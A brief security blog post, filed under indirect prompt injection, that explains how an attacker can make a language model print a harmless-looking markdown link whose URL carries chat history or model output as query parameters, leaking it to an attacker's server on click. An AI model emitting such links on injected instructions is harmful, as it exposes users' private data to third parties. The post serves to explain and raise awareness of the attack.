Author name: Martin

Uncategorized

LLM01: Indirect Prompt Injection | Exfiltration to attacker

Data exfiltration from a large language model (LLM) can be performed using markdown formatting and link printing by embedding sensitive information within URLs, with chat history appended as query parameters. For instance, an attacker could craft a markdown link that appears harmless but actually encodes extracted data within the URL, directing it to an external server under their control. When the user clicks the link, the browser sends the query parameters—containing sensitive chat history or model outputs—to the attacker’s server, effectively leaking data without raising suspicion. This method leverages the fact that markdown allows hyperlinking without alerting the user to the true nature of the destination, making it a stealthy exfiltration vector.

Scroll to Top